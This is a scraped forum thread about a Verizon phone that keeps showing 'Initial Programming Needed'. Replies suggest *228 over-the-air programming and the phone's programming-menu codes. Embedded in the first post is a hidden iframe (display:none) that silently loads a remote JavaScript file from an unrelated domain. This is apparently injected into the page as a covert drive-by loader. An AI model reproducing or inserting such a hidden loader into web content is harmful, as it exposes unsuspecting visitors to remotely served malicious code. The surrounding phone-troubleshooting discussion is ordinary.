+ Reply to Thread
    Mac OS X user

Initial programming needed!

Whenever the phone portion powers on, the Phone app says "Initial Programming Needed."

Perhaps related (?), when I say OK, the banner is "Verizon Wireless" instead of my custom banner. If I wait a while, the banner becomes my custom banner again. Then it bounces back and forth between banners every few minutes.

The phone has been programmed (once at the store, once by my doing *228 1 and 2) and I can make and receive calls just fine.

Any ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    - Paul

The Verizon Wireless banner coming back and then going off and on every few minutes is standard for most of the VZW phones with the latest firmware. As for the other message, I would try over the air programming by dialing *228 and then using option 1 to program the phone. If it was done properly in the store, this shouldn't hurt anything and may clear up the problem.

Mac OS X user

Fixed (by accident?)

Well, after puttering around with the phone, I tried dialing 111111, selecting Options, Programming, entering 00000, had it reject the code as invalid. But now when powering on the phone, it no longer complains about needing an initial programming. But I suppose I'm happier now.

I'm assuming Verizon sells their phones locked (?).
    - Paul

Re: Fixed (by accident?)

Originally posted by pauljlucas
    Well, after puttering around with the phone, I tried dialing 111111, selecting Options, Programming, entering 00000, had it reject the code as invalid. But now when powering on the phone, it no longer complains about needing an initial programming. But I suppose I'm happier now.

I'm assuming Verizon sells their phones locked (?).
    Not generally.... Note that it's 6 0's.

Mac OS X user

Re: Re: Fixed (by accident?)

Originally posted by turboCat
    Not generally.... Note that it's 6 0's.
    Whoops. Yep, 6 0's works.
    - Paul